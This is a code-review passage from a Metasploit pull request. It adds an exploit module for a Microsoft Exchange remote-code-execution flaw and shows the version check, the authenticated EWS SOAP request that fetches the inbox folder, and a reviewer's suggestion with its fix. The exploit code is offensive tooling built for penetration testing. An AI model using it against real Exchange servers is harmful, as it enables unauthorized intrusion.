modules/exploits/windows/http/exchange_chainedserializationbinder_blacklist_typo_rce.rb

```diff
@@ -0,0 +1,430 @@
+
+      prepend_range = version_range[0].canonical_segments[0..-2]
+      lowest_patch = version_range[0].canonical_segments.last
+      while Rex::Version.new((prepend_range.dup << lowest_patch).join('.')) <= version_range[1]
+        res = send_request_cgi(
+          'method' => 'GET',
+          'uri' => normalize_uri(target_uri.path, "/ecp/#{build}/exporttool/")
+        )
+        unless res
+          return CheckCode::Unknown('Target did not respond to check.')
+        end
+        if res && res.code == 200
+          return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
+        end
+
+        lowest_patch += 1
+      end
+
+      CheckCode::Unknown('Could not determine the build number of the target Exchange Server.')
+    end
+  end
+
+  def exploit
+    # Get the user's inbox folder's ID and change key ID.
+    print_status("Getting the user's inbox folder's ID and ChangeKey ID...")
+    xml_getfolder_inbox = %(<?xml version="1.0" encoding="utf-8"?>
+    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+      <soap:Header>
+      <t:RequestServerVersion Version="Exchange2013" />
+      </soap:Header>
+      <soap:Body>
+      <m:GetFolder>
+        <m:FolderShape>
+        <t:BaseShape>AllProperties</t:BaseShape>
+        </m:FolderShape>
+        <m:FolderIds>
+        <t:DistinguishedFolderId Id="inbox" />
+        </m:FolderIds>
+      </m:GetFolder>
+      </soap:Body>
+    </soap:Envelope>)
+
+    # Lot of this is taken from modules/auxiliary/scanner/http/owa_ews_login.rb
+    cli = Rex::Proto::Http::Client.new(datastore['RHOSTS'], datastore['RPORT'], {}, datastore['SSL'], datastore['SSLVersion'], datastore['Proxies'], datastore['USERNAME'], datastore['PASSWORD'])
+    cli.set_config({ 'domain' => datastore['DOMAIN'] })
+    cli.set_config({ 'preferred_auth' => 'NTLM' })
+    cli.connect
+
+    begin
+      req = cli.request_raw(
+        {
+          'method' => 'POST',
+          'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),
+          'data' => xml_getfolder_inbox,
+          'username' => datastore['USERNAME'],
+          'password' => datastore['PASSWORD'],
+          'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.
+        }
+      )
+      res = cli.send_recv(req)
+    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+
+    unless res&.body
+      fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
+    end
+
+    xml_getfolder = Nokogiri::XML(res.body)
```

Comment:
```suggestion
xml_getfolder = res.get_xml_document
```

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/16164/commits/c49591cf11aff8bc9839d7aedb1389a46ad2cc88